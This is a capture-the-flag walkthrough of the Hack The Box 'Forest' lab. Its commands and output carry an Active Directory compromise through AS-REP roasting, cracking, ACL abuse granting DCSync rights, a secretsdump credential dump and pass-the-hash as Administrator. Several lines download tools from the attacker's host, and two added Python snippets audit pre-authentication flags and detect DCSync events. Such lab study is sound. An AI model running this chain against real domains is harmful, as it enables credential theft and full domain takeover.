Forest
Forest is an easy HTB lab that focuses on Active Directory, disabled Kerberos pre-authentication and privilege escalation. In this walkthrough, we will go over the process of exploiting the exposed services and gaining access to the root user.
Recon
The first step in any penetration testing process is reconnaissance. We can start by running an nmap scan against the target machine to identify open ports and services.
[★]$ sudo nmap -p- -sV -sC 10.129.13.212
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-06 09:02 GMT
Nmap scan report for 10.129.13.212
Host is up (0.017s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-06 09:10:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
57183/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-06T09:11:31
|_ start_date: 2024-01-06T08:57:08
|_clock-skew: mean: 2h46m49s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-01-06T01:11:33-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.16 seconds
Adding the new domain names to /etc/hosts:
$ sudo tee --append /etc/hosts <<< "10.129.13.212 dc.htb.local htb.local"
Enumerating the LDAP data:
$ ldapsearch -x -H ldap://10.129.13.212 -b "dc=htb,dc=local"
$ ldapsearch -x -H ldap://10.129.13.212 -b "dc=htb,dc=local" | grep sAMAccountName
$ rpcclient -N -U '' 10.129.13.212
rpcclient $> querydispinfo
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
User
Using the account names from this output, we can build a users.txt list. We can then use that list to check which accounts have Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH set):
[★]$ GetNPUsers.py -usersfile users.txt -request -format hashcat -dc-ip 10.129.13.212 'htb.local/'
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
...
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0fd9cf833e13e3bb64e0e1726176e386$33ae4feaba7de00ce4232cd4cf0fc864694ca6bf3b310baf93335269868fee0802b1a5eb4ce848876f3a4fef128900c88c0720e7be92f5e24d2fb6320b0b5dd07ba2a89655bb1df5c2709ff64c5899ebd3dcf7dc05abc4d2e86fde46d12a59a0309bfe98b46f11464530009c5d7bf837d13c76815446f1092d7257bbb04776142155dec4c6b2ddb92de25d06b9428df93bbb33090e253a8245d3cecfdd21b4dac636d96919c2c31953c973673382bdad680c9855bb1af1a11ee603da747ef1dbf3037e8561e6b75eca7c20c66d582df36325872506d10b7651ee21bd2dd474d20210e47b5943
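The acb field in the rpcclient querydispinfo output above already explains this result: it carries the SAMR account-control bits, and svc-alfresco is the only enabled account with the DONT_REQUIRE_PREAUTH bit (0x10000) set, while the disabled accounts are the ones the KDC answers with KDC_ERR_CLIENT_REVOKED. The following added example (not part of the original walkthrough) decodes those bits from a constructed subset of the lines; a defender can run the same check over a full querydispinfo dump to audit for accounts that do not require pre-authentication.

```python
import re

# SAMR account-control bits as shown in rpcclient's "acb:" field.
# Only the flags this audit needs; values follow the SAMR ACB_* definitions.
ACB_DISABLED = 0x00000001
ACB_PWNOTREQ = 0x00000004
ACB_PWNOEXP = 0x00000200
ACB_DONT_REQUIRE_PREAUTH = 0x00010000
ACB_PW_EXPIRED = 0x00020000

# Constructed sample: a subset of the querydispinfo lines from this box.
SAMPLE = """\
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
"""

LINE_RE = re.compile(r"acb:\s*(0x[0-9a-fA-F]+)\s+Account:\s*(\S+)")

def parse_dispinfo(text):
    """Return {account: acb_flags} from querydispinfo output."""
    return {m.group(2): int(m.group(1), 16) for m in LINE_RE.finditer(text)}

def audit(text):
    """Classify accounts the way the KDC treats them during an AS-REQ."""
    roastable, disabled, no_password = [], [], []
    for name, acb in parse_dispinfo(text).items():
        if acb & ACB_DISABLED:
            disabled.append(name)   # KDC answers KDC_ERR_CLIENT_REVOKED
        elif acb & ACB_DONT_REQUIRE_PREAUTH:
            roastable.append(name)  # AS-REP is returned without pre-auth
        if acb & ACB_PWNOTREQ:
            no_password.append(name)  # password-not-required is worth a look too
    return {"roastable": roastable, "disabled": disabled, "no_password": no_password}

if __name__ == "__main__":
    for category, names in audit(SAMPLE).items():
        print(f"{category}: {names}")
```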
Cracking the hash with hashcat:
$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
This recovered the password for the user svc-alfresco as ***v***.
Getting the flag:
[★]$ evil-winrm -i 10.129.13.212 -u svc-alfresco -p ***v***
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~
Privilege Escalation
Checking permissions:
*Evil-WinRM* PS C:\Users\svc-alfresco> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/6/2024 1:30:38 AM
Password expires Never
Password changeable 1/7/2024 1:30:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/6/2024 1:26:14 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Service Accounts
The command completed successfully.
Collecting the Active Directory graph with SharpHound:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/SharpHound.exe -o SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download "C:/Users/svc-alfresco/Documents/20240106013631_BloodHound.zip"
Loading the collection into BloodHound (backed by neo4j) gives the following path to move forward:
svc-alfresco --MemberOf--> SERVICE ACCOUNTS@HTB.LOCAL --MemberOf--> PRIVILEGED IT ACCOUNTS@HTB.LOCAL --MemberOf--> ACCOUNT OPERATORS@HTB.LOCAL
ACCOUNT OPERATORS@HTB.LOCAL --GenericAll--> EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL --WriteDacl--> HTB.LOCAL
Searching for how GenericAll on a group can be abused, found the following reference: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericall-on-group
Effectively, this allows us to add ourselves (the user svc-alfresco) to the EXCHANGE WINDOWS PERMISSIONS group:
> net group "EXCHANGE WINDOWS PERMISSIONS" svc-alfresco /add /domain
Searching for how WriteDacl can be abused, found the following reference: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse#abuse-writedacl
Setup:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/Powermad.ps1 -o Powermad.ps1; Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/PowerView.ps1 -o PowerView.ps1; Import-Module .\PowerView.ps1
Attack 1:
$ ldapsearch -x -H ldap://10.129.13.212 -b "DC=htb,DC=local"
$ python3 DCSync.py -dc dc.htb.local -t 'CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local' 'htb.local\svc-alfresco:s3rvice'
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to dc.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[-] Error when updating ACL: {'result': 50, 'description': 'insufficientAccessRights', 'dn': '', 'message': '00000005: SecErr: DSID-03152870, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'}
Attack 2 (the DCSync.py attempt above failed with insufficientAccessRights, so instead a new user is created, added to the group, and granted DCSync rights with PowerView):
> net user john s3rvice /add /domain
> net group "EXCHANGE WINDOWS PERMISSIONS" john /add /domain
> net localgroup "Remote Management Users" john /add
> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('htb\john', $SecPassword)
> Add-ObjectAcl -Credential $Cred -PrincipalIdentity 'john' -Rights DCSync
Now we get the dump of the secrets:
$ secretsdump.py john:s3rvice@htb.local
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b************32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
...
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
...
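The DRSUAPI dump above is exactly what a domain controller records as Security event 4662 with the DS-Replication-Get-Changes control-access GUIDs in the Properties field. The following added detection example (not from the original walkthrough) flags such events when the subject is not a known DC machine account; the event records are constructed, and the KNOWN_DCS allow-list is an assumption for this domain.

```python
import re

# Control-access rights the DC checks before serving replication data;
# a DCSync-style dump (secretsdump over DRSUAPI) needs the first two.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Assumption: the only principals expected to replicate are the domain's
# DC machine accounts; for this box that is FOREST$.
KNOWN_DCS = {"FOREST$"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample of event 4662 records, reduced to the fields the check
# needs. Properties is the raw multi-line field as written to the event.
# The GUID in the second record is a placeholder attribute GUID.
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "ObjectName": "DC=htb,DC=local",
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000001}"},
    {"EventID": 4662, "SubjectUserName": "john", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "SubjectUserName": "john", "Properties": ""},
]

def is_dcsync(event):
    """True when a 4662 shows a non-DC principal exercising replication rights."""
    if event.get("EventID") != 4662:
        return False
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not guids & REPLICATION_GUIDS:
        return False  # ordinary directory access, not replication
    return event.get("SubjectUserName", "").upper() not in KNOWN_DCS

def dcsync_alerts(events):
    """Return the subject names that should be investigated."""
    return [e["SubjectUserName"] for e in events if is_dcsync(e)]

if __name__ == "__main__":
    for name in dcsync_alerts(EVENTS):
        print(f"ALERT: replication rights exercised by non-DC principal {name}")
```

Alerting on the earlier steps of the chain (the new account, its addition to EXCHANGE WINDOWS PERMISSIONS, and the DACL change on the domain object) gives warning before the dump itself happens.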
Getting the flag:
$ evil-winrm -i 10.129.13.212 -u administrator -H 32693b************32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~